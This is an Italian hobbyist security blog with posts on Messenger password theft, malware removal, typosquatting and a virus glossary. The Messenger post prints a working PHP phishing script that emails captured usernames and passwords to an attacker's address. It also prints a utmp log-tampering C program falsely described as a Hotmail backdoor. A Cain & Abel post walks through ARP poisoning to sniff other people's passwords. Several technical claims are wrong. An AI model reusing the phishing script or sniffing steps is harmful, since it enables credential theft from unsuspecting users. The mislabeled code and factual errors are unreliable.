IL RUBATORE DI PASSWORD!: Safety Web Area - Sicurezza informatica sul Web e per il PC

Nozioni base di sicurezza per Windows Live Messenger

Fri, 10 Aug 2007 07:51:22 GMT

Secondo una statistica, di cui non ricordo mai la provenienza, il primo programma instant-messaging utilizzato in tutto il mondo é Windows Live Messenger di casa Microsoft, seguito da Yahoo! Messenger. Proprio perché é il più usato, Windows Live Messenger é anche quello più soggetto a malintenzionati che vogliono ribare la password altrui, ma come fare a tenersi al riparo da questi ritardati mentali? Ecco i modi che un utente può utilizzare per riuscire a prendervi la password:

1) tramite una chiavetta USB, l'utente può avviare un programma, spesso di tipo sniffer o spoofing, che capta le password. SOLUZIONE: non memorizzare mai la password nel PC;

2) utilizzando un attacco che gli hacker chiamano brute force, ovvero forza bruta, e proprio perché é un attacco di forza bruta l'utente tira ad indovinare. SOLUZIONE: usate una password che contenga numeri, lettere e caratteri speciali. Eccone una: ]}°òPò876§§§@[*};

3) tramite la domanda segreta, utilizzata in tutti quei casi l'utente si dimentichi la password (SOLUZIONE: vi serve più fosforo). Infatti il malintenzionato può tentare di indovinare la risposta alla domanda, specialmente se vi conosce. SOLUZIONE: aggiungete alla fine della risposta una parola senza senso che non c'entri nulla col resto della risposta;

4) utilizzando il social engineering: molti utenti si creano indirizzi e-mail del tipo msn_staff@hotmail.it o supporto@hotmail.it, vi inseriscono tra i loro contatti e vi convincono di dargi la password e l'indirizzo e-mail poiché sono in corso degli aggiornamenti nei loro database. SOLUZIONE: state alla larga da questi contatti;

5) usando programmi come Messenger Pass, il Keylogger o addirittura l'apparente innocuo RockXP;

6) usando il Cookie Grabbing, che é semplicemente indistruttibile, ma siccome é stato fixato il bug che tale tecnica usufruiva é, attualmente, inutilizzabile, ma se dovessero risistemarlo, non avrete scampo. SOLUZIONE: eliminate tutti i cookie dopo ogni navigazione ed utilizzate ripulitori di sistema ed antivirus a volontà;

7) usando exploit, ovvero dei programmi backdoor che inserendosi nel server di Hotmail ruba le password a bizzeffe. Ad esempio un codice sorgente di una backdoor (in ambiente UNIX) é il seguente:

CODICE

-= INIZIO CODICE =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <utmp.h>
#include <sys/stat.h>

struct utmp *user;
char *usrt;

main (argc,argv)
int argc;
char *argv[];
{
int fatto=0, cnt=0, start=1, index=0;
char err[80];
if (argc == 1) printf("Removing you from utmp\n");
if (argc == 2) printf("Changing your login to %s\n",argv[1]);
utmpname("/etc/utmp");
usrt = strrchr(ttyname(0),'/');
strcpy(usrt,++usrt);
while (fatto != 1) {
user = getutent();
cnt++;
if (strcmp(user->ut_line,usrt) == 0) fatto=1;
}
utmpname("/etc/utmp");
for (start=0; start<cnt; start++) {
user = getutent();
}
if (argc == 1) {
user->ut_type = LOGIN_PROCESS;
strcpy(user->ut_name,"LOGIN");
}
else user->ut_type = USER_PROCESS;
if (argc == 2) strcpy(user->ut_name,argv[1]);
pututline(user);
endutent();
}

-= FINE CODICE =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

SOLUZIONE: utilizzate un buon Firewall ed eventualmente un buon router/modem;

8) usando un fake login, ovvero utilizzare una pagina HTML identica a quella originale in cui eseguiamo il Log In nella nostra e-mail box di Hotmail, ma che invia la password ad un indirizzo di posta elettronica. Tutto si basa sull'uso di un file in PHP, di cui sono riuscito a trovarne il codice sorgente:

CODICE

<?

///////////////////////////////////

$yourmail = "mioaccount@mail.it"; //QUI E' DOVE VIENE MESSO L'INDIRIZZO DI POSTA ELETTRONICA DEL MALINTENZIONATO

///////////////////////////////////

// COMMENTI NON INSERITI

if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
$useragent=$_SERVER['HTTP_USER_AGENT'];
$td = date("F jS");
$date = date("d M, Y");
$time = date("g:i a");
$LogTime = trim(" Date: ".$date.", Time: ".$time);

mail("$yourmail", "Account $account", "Username: $account \nPassword: $password \n\nIndirizzo ip: $ip \nData log: $LogTime \nSystem Info: $useragent \n\nCoder SNaKE\nwww.myhackerzone.altervista.org","from: $account <$account>");
header( "Location: https://login.passport.net/uilogin.srf?lc=1040&id=2");
?>

SOLUZIONE: non loggatevi mai in siti Web che non siano di proprietà della MSN.

Il demone delle reti P2P

Fri, 06 Apr 2007 10:42:53 GMT

Il demone delle reti P2P

Oramai per molti utenti è consuetudine utilizzare un software P2P come eMule, che possiamo definire come il nostro "centro commerciale virtuale". Molti non sanno però che le reti usate da questi software sono assai esposte a virus e pirati informatici. Tra i virus, infatti, ce n'è uno in particolare: Small.dam.

DESCRIZIONE VIRUS

Small.dam è un particolare trojan, che occupa 29.347 byte circa e che è mirato verso i S. O. Windows (9X, ME, NT, 2000 ed XP). La sua diffusione è alta, ma il livello della sua infezione è di livello medio. Small.dam è stato creato in seguito all'evento dell'uragano Kryll, che ha attraversato il nord Europa, creando seri problemi. Proprio per questo, i virus writer hanno approfittato della drammaticità della situazione per creare tale trojan.

COSA E' IN GRADO DI PROCURARE

Small.dam è un virus che si occupa delle reti P2P utilizzando la porta UDP. Lo scopo del virus è questo: stabilirsi all'interno del registro di sistema e creare una backdoor, che può essere usata da un qualsiasi pirata informatico per controllare il PC infetto ogniqualvolta esso si trovi connesso ad Internet. Oltre questo, Small.dam riduce il PC ad un botnet, ovvero un PC "zombie" inserito nel contesto di una rete il cui scopo è fornire spamming e atti di phishing. Quando si acquisisce il virus, esso crea una nuova chiave nel registro di sistema, chiamata HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wincom32

e un file EXE che si va ad inserire nella directory C:\Windows\System32\, chiamato wincom32.sys. Tale file può essere acquisito quando si clicca in un e-mail in cui vengono dette delle cose inerenti all'uragano Kryll, che sono assolutamente false. Addirittura, in una di queste e-mail si dice che Saddam Hussein sia ancora vivo.

La chiave che viene creata da Small.dam ha invece il compito di attuare il processo services.exe, che permette al trojan di attivarsi sempre, ogniqualvolta si avvia Windows. Naturalmente, Small.dam non poteva fermarsi: dopo tutte queste operazioni, continua la sua infezione creando il file peers.ini inserito nella cartella C:\Windows, con la quale Small.dam ottiene una lista di IP Adress usati dal software P2P con la quale potersi diffondere. In poche parole, si crea i suoi trampolini di lancio. Successivamente, mettendosi in connessione con gli altri PC infetti (tramite la lista peers), scarica sul sistema vittima il rootkit game0.exe, che nei laboratori Symantec viene definito come Trojan.Abwiz.F, e gli eseguibili game1.exe, game2.exe, game3.exe e game4.exe, che sono, tra l'altro, varianti del worm W32.Mixor.Q@mm; gli eseguibili hanno la capacità di rubare gli indirizzi presenti nella ribrica e continuando lo spamming. Insomma, Small.dam è un vero incubo per tutti gli utenti.

COME E' POSSIBILE ELIMINARLO

Come ogni virus pericoloso che si rispetti anche Small.dam ci rode nell'eliminarlo. Occorre dire che le operazioni di eliminazione del virus sono parecchie...

disabilitazione del ripristino configurazione del sistema - questo ci permetterà, in seguito, di non ritrovarci di nuovo con Small.dam. Questo, da una parte, è un punto a nostro vantaggio, dall'altra, invece, può capitare che il sistema faccia una copia di backup infetta, ma noi rischiamo (certamente avrete capito che a me piacciono MOLTO le sfide ). Andate su Start - Pannello di controllo - Sistema - Ripristino configurazione di sistema - Disattiva Ripristino configurazione di sistema - Applica;
blocco dei processi in esecuzione - occorre, dopo la fase 1, lavorare in ambiente protetto e con i processi bloccati: occorre, quindi, avviare il sistema in modalità provvisoria: se riavviate il PC, prima del caricamento del logo di Windows premete il tasto F8, e poi fate Invio sulla voce Riavvia il sistema in modalità provvisoria;
rimozione del trojan (PARTE I) - adesso viene la parte dell'eliminazione. Dopo che Small.dam ci ha rotto le scatole, finalmente lo possiamo mandare a casa. Per rimuovere il trojan, basta che aggiorniate il vostro antivirus preferito (io ho 3 antivirus... poi voi fate quello che volete) e che avviate una full scan del sistema. Fatto questo, l'antivirus vi DEVE dare traccia del virus. Naturalmente, eliminatelo e non siate clementi; successivamente, riavviate il sistema;
rimozione del trojan (PARTE II) - adesso che il trojan è scomparso (assicuratevi che ogni traccia di quest'ultimo sia scomparsa prima di procedere), possiamo procedere all'eliminazione delle sottochiavi create dal file wincom32.sys. Innanzitutto, dobbiamo accedere al registro di sistema: Start - Esegui - regedit - Invio. Verrete catapultati nel registro di sistema. Adesso, dalla voce File, cliccate su Esporta, verifichiamo che la voce Tutto sia selezionata: in questo modo, avrete una copia di backup delle chiavi del registro di sistema. Date un nome al file e poi salvate. Adesso identifichiamo la sottochiave HKEY_LOCAL_MACHINES\SYSTEM\CurrentControlSet\Services\wincom32 e selezioniamola, dopodiché eliminiamola;
rimozione del trojan (PARTE III) - adesso dobbiamo veramente sicerarci che non ci sia nessuan traccia né del trojan né dei suoi derivati. Ultimi file da eliminare sono il rootkit Trojan.Abwiz.F e i file game[1-2-3-4].exe, che sono varianti del worm W32.Mixor.Q@mm. Per quest'ultima operazione, dobbiamo utilizzare un apposito tool, denominato FixAbwiz, che può essere facilmente scaricato dal link http://securityresponse.symantec.com/avcenter/FizAbwiz.exe. Con esso, avviamo una scansione, che tra l'altro dovrebbe durare pochi minuti. Con il tool abbiamo cancellato dalla faccia del PC il rootkit, ma le varianti del worm, cioè i file game[1-2-3-4].exe dovranno essere tolti manualemente. Apriamo l'editor e cerchaimo le sottochiavi HKEY_LOCAL_MACHINES\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersione\Run. Attenzioniamo la prima sottochiave. Nella parte destra cerchiamo la voce "agent"= "%System%\ppl.exe" oppure "agent"=%System%\alsys.exe". Se la troviamo, eliminiamola. Adesso focalizziamoci sulla seconda sottochiave. Con la stessa procedura, eliminiamo i valori "taskdir"="%System%\taskdir.exe" e "adir"="%System%\adirss.exe". Adesso cerchiamo la sottochiave HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess. Dopo aver individuato la voce Start riportiamo valore al default: ecco il modo per farlo: scegliete la voce Modifica e digitiamo il valore 4 nel campo Dati valore, alla fine facciamo clic su Ok.

Un nuovo nemico: Win32/Bagle

Thu, 15 Mar 2007 15:47:37 GMT

Un nuovo nemico per il PC:

Win32/Bagle

Bagle è un nuovo virus abbastanza fastidioso. Più tecnicamente, è un worm polimorfo, che attacca i software di sicurezza, disablitando sia essi che i servizi di Windows.

I sistemi vulnerabili a Bagle sono Windows 9x/ME/NT/200/XP/Server 2003

Come sbarazzarsi di Bagle

In questo caso, i software di sicurezza vengono disabilitati, e quindi non possiamo contare sul loro prezioso aiuto. Innanzitutto occorre "snidiare" il nostro amico, che si è intrufolato nell'hard disk:

occorre fare una full scan dell'hard disk. Quando finite la scansione, dovete copiare i risultati della scansione;
copiate i risultati ed incollateli in una nuova pagina del Blocco Note (Start - Tutti i programmi - Accessori - Blocco Note). A questo punto controllate se nell'elenco sono presenti i file hldrrr.exe, wintems.exe e hidr.exe e poi cercate i driver m_hook.sys;
adesso, avviando il Task Manager di Windows, reperibile premendo la sequenza di tasti Ctrl+Alt+Canc, controlliamo nel tab Processi se tra le varie operazioni è presente il primo tipo di file citato nel punto 2 (hldrrr.exe). Se questo è presente, allora possiamo continuare l'eliminazione;

PREMESSA - Quando una macchina è stata infetta da un qualsiasi tipo di virus, è assai probabile che il sistema faccia delle copie di backup dei codici nocivi, il che comporta una riapparsa del virus, anche dopo la sua rimozione. Per procedere quindi dobbiamo disattivare questo strumento. Andando su Start - Impostazioni - Pannello di controllo - Sistema (cliccare sull'icona per due volte) e dirigersi sul tab Ripristino configurazione di sistema, da cui spuntiamo Disattiva Ripristino configurazione di sistema; alla fine applichiamo le modifiche.

Bagle è uno di quei virus che non permettono il funzionamento dei sistemi di sicurezza del software, il che ci rende più difficile la sua rimozione. Occorre quindi usare un software che permette di bypassare il problema. In questo caso, è consigliabile usare The Avenger. Se apriamo The Avenger, spuntiamo Load Script from file:. Occorre adesso creare lo script da caricare col nostro software;
aprite il Blocco Note ed immettiamo un nome qualsiasi. Il contenuto della nuova pagina dovrà contenere i dati che vi ho immesso qui di seguito:

Files to delete

%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires\m_hook.sys

%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires\hidr.exe

%SystemDrive%:\WINDOWS\System32\wintems.exe

%SystemDrive%:\WINDOWS\system32\hldrrr.exe

folders to delete:

%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires

%SystemDrive%:\WINDOWS\exefld

registry keys to delete:

HKLM\SYSTEM\CurrentControlSet\Services\m_hook

HKLM\SYSTEM\CurrentControlSet\Enum\Root\

LEGACY_M_HOOK

registry values to delete:

HKLM\Software\Microsoft\Windows\Current

Version\Run\ hldrrr

Ricordare che la sigla %SystemDrive% e [utente corrente] devono essere rispettivamente sostituiti con l'unità hardware in questione e il nome dell'utente.

Alla fine, salvate il file e chiudete il Blocco Note. Adesso che abbiamo il nostro bel script fatto in casa, dobbiamo caricarlo con The Avenger. Alla fine della scansione, The Avenger ci chiederà di riavviare il PC e quindi voi effettuate il riavvio. Dopo il riavvio, ci verrà mostrato il log delle scansioni. Continuiamo la nostra caccia a Bagle usando l'editor del registro inserendo, da Start - Esegui, il comando regedit e cerchiamo la chiave HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.

Adesso nella finestra di destra cerchiamo le voci hldrrr, drvsyskit e german.exe; se le abbiamo trovate, eliminatele, assieme alle chiavi HKEY_CURRENT_USER\Software\DateTime4, HKEY_CURRENT_USER\Software\FirstRRRun.

Come recuperare la password dell'e-mail box

Sun, 11 Mar 2007 12:37:43 GMT

Capita, a volte, che qualcuno possa dimenticare la password della propria e-mail box (la casella di posta elettronica diversa ed unica sul Web per ogni utente registrato al servizio/provider). Allora, lì per lì, l'utente si strappa i capelli dalla testa, cercando di spremersi le meningi in modo da ricordare la password. Esiste un metodo un pò più semplice per recuperare la password perduta.

Kamui The Best

alla ricerca della password perduta

Per recuperare la nostra password (anche a me, una volta, è successo, poi ho risolto la situazione in questo modo), occorre possedere diversi requisiti:

il programma Cain & Abel
driver WinPcap v4.0 beta2

A questo punto, possiamo avventurarci alla ricerca della password perduta...

per prima cosa, occorre installare il programma Cain & Abel (Nota: alcuni antivirus, come Norton o Kaspersky, possono indentificare Cain & Abel come software pericoloso; in tal caso, ignoriamo tutto);
a questo punto subentrano i driver WinPcap v4.0 beta2: al termine dell'installazione di Cain & Abel, infatti, verrà richiesta l'installazione di questi driver, che tra l'altro sono necessari, in quanto senza di essi Cain & Abel non sarebbe in grado di reperire la password;
adesso, dopo queste installazioni, avviamo Cain & Abel. Dopo averlo avviato, passiamo alla schermata Configure - Sniffer ed impostiamo la schede di rete che usiamo per connetterci ad Internet;
dall'interfaccia principale del programma, premiamo sul pulsante Start/Stop Sniffer, facciamo clic col tasto destro del mouse su un punto vuoto della finestra, e, dal menu contestuale, facciamo clic su Scan MAC Adress e confermiamo cliccando su OK;
(FASE FACOLTATIVA) Nel caso non si conosca il proprio IP Adress, dovete aprire il prompt dei comandi (Start - Tutti i programmi - Accessori - Prompt dei comandi oppure facendo Start - Esegui ed inserendo nel campo sottostante cmd). Dopo aver aperto il prompt, inserite il comando ipconfig e premete Invio. A questo punto, cercate la voce Indirizzo IP e, accanto a questa scritta, c'è una serie di numeri: quello è il vostro indirizzo IP;
adesso ritorniamo su Cain & Abel e premiamo su APR, spostandoci sulla sezione Sniffer e cliccando sul tab APR; a questo punto, clicchiamo in una zona vuota all'interno dell'area Configuration/Routed Packets e premiamo il pulsante Add to list nella barra degli strumenti (quello a forma di +);
apparirà a video la nuova schermata New ARP Poison Routing. Scorrete la lista di sinistra ed identificate un IP Adress casuale (quello di vostra sorella va benissimo...), mentre nella lista di destra scegliete quello del vostro router/modem. Alla fine, cliccate su OK per procedere;
adesso, selezionando il vostro IP Adress, vi apparirà automaticamente la vostra amata password; per quanto riguarda l'IP Adress di vostra sorella, beh, un pò di immaginazione...

..:Kamui The Best:..

Il gemello cattivo: attenti a quello che scrivete!

Thu, 01 Feb 2007 15:53:18 GMT

Il gemello cattivo:

Attenti a quello che scrivete!

Una bella navigata in Internet, che bello!

Spesso capita di sbagliare URL di un sito, ma a volte sbagliare ci porta ad un'infezione di virus totale. Tutto funziona così: siete tornati dall'ufficio o avete appena finito di fare i compiti e volete fare una bella navigata su Internet. Cerchiamo delle belle foto di automobili oppure l'ultimissima recensione sulla PlayStation 3, e per farlo, si sa, si usa un motore di ricerca. Il motore di ricerca più famoso è certamente Google (che ricordiamo ha comprato anche YouTube, il sito dove si trovano i video musicali). Quindi digitiamo www.google.it, ma, per sbaglio, non ci accorgiamo che abbiamo messo gookle, invece di google. Nessun problema, visto che la schermata che appare è uguale alla schermata che appare se entriamo in Google, ma cosa succede internamente al nostro software? Tutto comincia ad essere infettato da miriadi di virus.

Che fare?

La soluzione è e rimarrà sempre una: avviare una full scan con un ottimo antivirus (Norton o Kaspersky vanno benissimo). Il virus che avvia download immediati (si parla di 5 millisecondi per virus acquisito) viene definito virus Typosquatting. Esso, quando è avviatosi, presentasi con una scritta simile:

VIRUS ALERT!

YOUR PC IS INFECTED!

IT HAS BEEN DETECTED THAT YOUR PC HAS LEAST 3 DANGEROUS VIRUSES!

TO KNOW FOR SURE YOU URGENTLY NEED TO RUN AN ANTIVIRUS TEST ON YOUR PC!

The consequences of spyware and virus presence on your pc might belike: loosing all the data, data might be stolen, your secrets might beexsposed. PROTECT YOUR PC! REMOVE ALL VIRUSES NOW!

Naturalmente compare poi il pulsante che ci consente di avviare una "full scan" per rimuovere i virus. Ma questa è solo una scusa: cliccando su tale pulsante, infatti, non farete altro che scaricare altre centinaia di virus!

Il seguente intervento verrà inserito nell'Area Sicurezza Informatica del sito dopo il 25 febbraio 2007.

Tale intervento è disponibile sia in questo URL che in quello dell'Area Sicurezza Informatica.

..:Kamui The Best:..

Area Sicurezza Informatica

Mon, 02 Oct 2006 12:37:51 GMT

Area "Sicurezza Informatica"

Moduli creati da Kamui The Best

SEZIONE 1: I VIRUS

In questa prima sezione ci soffermeremo su un fenomeno assai comune, soprattutto per i navigatori della rete (vale anche per noi bloggatori e webmasters...), quello dei virus. Quando uno ha dei problemi in Internet, la prima cosa che pensa è l'effetto di qualche virus. Ma cosa sono i virus? La domanda sembrerà banale, ma cela una descrizione pazzesca e ha un enorme lavoro sull'uso di codici alle spalle.

I virus sono dei programmi, creati dai virus writer, composti da diverse parti:

stringhe replicate;
routine di ricerca, usata per la ricerca del file bersaglio;
routine di attivazione, usata per l'attivazione vera e propria del virus;
playload

In base ai parametri predisposti dai virus writer, abbiamo due tipi di virus, quelli definiti a ciclo degenerativo comune, ovvero quei virus che rispondo a determinati parametri pre-impostati, e quelli definiti a ciclo selettivo, ovvero quei virus che, per così dire, hanno i loro gusti. Abbiamo già fatto una prima classificazione sui virus, ma ne sistono altre, come ad esempio, la classificazione dei virus in base al tipo e a quali oggetti è orientato. Stavolta abbiamo più conocrrenti:

spyware - sono i virus situati sul Web che si "camuffano" da semplici banner;
adware - altri virus situati sul Web che si camuffano, stavolta, all'interno degli inserti pubblicitari (popup)
worm - i virus, in termini informatici, più semplici, spesso definiti anche kamikaze, perchè, non appena terminano la fase di infezione, si autodistruggono;
rabbit - la parola rabbit, se tradotta, significa coniglio. La particolarità di questi virus è, quindi, la rapidità con cui si riproducono (come i conigli, appunto);
macrovirus - questi virus sono completamente diversi da quelli sopraelencati, perchè non puntano contro le funzionalità di Internet, compromettendole, ma puntano ai programmi dell'unita C del PC, soprattutto quelli del pacchetto Office (Microsoft Word, Microsoft Excel, Microsoft Database, Microsoft Works, Microsoft Publisher, Microsoft FrontPage e Microsoft PowerPoint);
trojan - probabilmente questo termine non sarà a tutti nuovo, perchè è il virus più diffuso.

Naturalmente, a proteggervi ci sono gli antivirus (che applicano una tecnica che definisco hybridization-neutralize, ovvero ibridazione-neutralizzazione delle stringhe replicate di cui sono composti), ma se non avete nemmeno antivirus (cosa improbabile, comunque...), vi consiglio di attivare la funzione Windows Firewall che vi protegge, anche se in misura minore, dai virus e blcca i programmi dannosi.

SEZIONE 2: I PROGRAMMI SHARING

Chi di voi sa che cosa è eMule? Per chi non lo sapesse, eMule, e non solo, è un eccezionale programma sharing (sharing? Boh...). Di seguito, vi farò una descrizione sui programmi sharing.

Se traducete sharing, otterre un verbo: to share, che significa condividere. I programmi sharing, infatti, si basano sulla condivisione dei file sul Web. La cosa bella di questi programma è che potete scaricare, tramite condivisione file, tutto quello che volete. I principali programmi sharing sono eMule, aventi diversi versioni, BearShare, LimeWire, Shareaza, Morpheus e tantissimi altri. I programmi sharing non sono tutti uguali, perchè utilizzano diverse tecnologie. Ad esempio, sia BearShare che LimeWire utilizzano la tecnologia Gnutella, ovvero quella tecnologia che permette di scaricare senza collegarsi ad un server.

Adesso analizziamo il client eMule. Esso è il client sicuramente più usato in tutto il pianeta, ma non sempre dà i risulati che si sperano di ottenere. Ora vi spiego il perchè.

eMule è la versione successiva di eDonkey (da asino è diventato mulo). Se volete scaricarlo, cliccate QUI. Uno dei tanti problemi che eMule può dare è l'ID Basso. Avere un ID Basso significa stare "in fondo alla lista", ovvero impieghereste millenni per scaricare una canzone wav all'ultimo grido (una cosa che dovrebbe essere rapida!), quindi vi consiglio di seguire queste impostazioni. Naturalmente dovete scaricare il file .exe di installazione.

Avviate l'eseguibile eMule0.47c-Installer.exe facendo Italiano e premendo Ok. Cliccate su Avanti e fate Accetto per accettare la licenza. Nella schermata successiva fate Avanti e con Sfoglia scegliete dove volete installare il programma. Cliccate su Installa e poi Fine.

Adesso avviate eMule, e nella schermata che vi apparirà cliccate su Avanti. Digitate un nick a piacere e impostate le porte TCP e UDP (rispettivamente 44556 e 44557) usando quelle già configurate dal vostro router. Adesso cliccate su Testa Porte per verificare se tutto è ok, infine premete Avanti. Adesso nella finestra Server controlliamo che KAD e eD2K abbiano il segno di spunta. Confermate con Avanti e completate facendo Fine: così facendo apparirà il Wizard per le impostazioni della connessione.

SEZIONE 3: GLI HACKERS

Sapete chi sono gli hackers? Gli hackers, volendo, ma hanno ben altro da fare, sono quei tipi che possono entrare nei computer altrui (non allarmatevi!!!!).

Gli hackers sono quegli esperti di protocolli di sicurezza che utilizzano la loro esperienza soprattutto per migliorare le prestazioni del proprio computer. Ma sa fare molte altre cose un hacker: sa entrare illegalmente nei siti, sa creare programmi in breve tempo, sa navigare in modo invisibile, sa scoprire gli indirizii IP...

Siccome questi non sono i moduli dedicati all'hacking, vi mostrerò alcuni siti utili per la sicurezza sul Web.

Se avete paura che un hacker, dal vostro IP, arrivi al vostro computer, navigate segretamente cliccando QUI.

Vi consiglio vivamente di navigare invisibili, in modo da non essere rintracciati!